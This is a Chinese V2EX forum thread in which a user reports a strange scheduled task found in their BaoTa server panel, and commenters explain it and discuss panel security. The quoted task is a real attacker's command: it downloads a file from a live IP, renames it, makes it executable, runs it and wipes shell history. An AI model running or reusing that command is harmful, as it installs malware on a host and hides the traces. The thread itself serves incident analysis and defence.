我的宝塔面板里突然多了一个计划任务

317 天前
 angry41

wget http://103.122.247.146/seo.txt && mv seo.txt zabbix && chmod +x zabbix && ./zabbix && history -cw

2097 次点击
所在节点    问与答
15 条回复
angry41
317 天前
wget http://103.122.247.146/seo.txt:这个命令会使用 wget 工具下载一个名为 seo.txt 的文件从 http://103.122.247.146 这个地址。

&&:这个符号表示在前一个命令成功执行后才执行下一个命令。

mv seo.txt zabbix:将下载的 seo.txt 文件重命名为 zabbix 。

&&:再次使用 && 连接,执行下一个命令。

chmod +x zabbix:给 zabbix 文件添加可执行权限。

&&:再次使用 && 连接,执行下一个命令。

./zabbix:运行名为 zabbix 的文件。

&&:再次使用 && 连接,执行下一个命令。

history -cw:清除命令历史记录。
hefish
317 天前
宝塔这东西,感觉放公网有些危险,前端最好再弄一层认证。
或者在内网测试用用。
跑生产的话,感觉还是不用为妙。
yidinghe
317 天前
"mv seo.txt zabbix && chmod +x zabbix && ./zabbix" 这段就是打算执行这个文件了。这个 seo.txt 本质上是个可执行文件,目的可能是寻求系统漏洞,安装后门之类的。
yidinghe
317 天前
顺便说下,PHP 开发的东西出现漏洞的几率比其他语言大很多,所以连开源软件我向来都是避开 PHP
Allenqjy
317 天前
玩票项目才会用宝塔,要长期运转的项目绝对不装任何面板
CoderLife
317 天前
从来不用 bt 这些玩意儿
Bingchunmoli
317 天前
宝塔有云控,权限不再自己这边,所以一般不用的
Erroad
317 天前
文件头 ELF ,下载了个可执行文件执行了
dnslint
317 天前
10M 带宽的机器
9i5NngJHI4P7dm42
317 天前
宝塔? 生怕自己不变肉鸡是吧
woshinide300yuan
316 天前
@yidinghe 就你一个人回答问题,我真是笑了。


========
计划任务里出任何东西都是被黑了,正常不存在的,备份数据然后重装吧。
另外可以考虑除了必要端口外,都在云控制面板里锁死登录 IP 。
我自己是 80 和 443 以外,都仅限个人电脑或者一台吃灰 windows 云登录,过去这 6 7 年没什么安全问题,哪怕密码就是 123456qweR
WashFreshFresh
315 天前
@woshinide300yuan 个人的 ip 不是会变吗,你总不能每次变了后再改配置吧。
woshinide300yuan
315 天前
@WashFreshFresh 我不是写俩条件吗。 但的确每次重启后会再配置,所以我家路由器几个月不重启一次。
woshinide300yuan
315 天前
@WashFreshFresh 就是去阿里云后台改个安全组 IP ,其他的不变。
esile
315 天前
@Bingchunmoli 听说可以免密登录任何后台

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/1007577

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX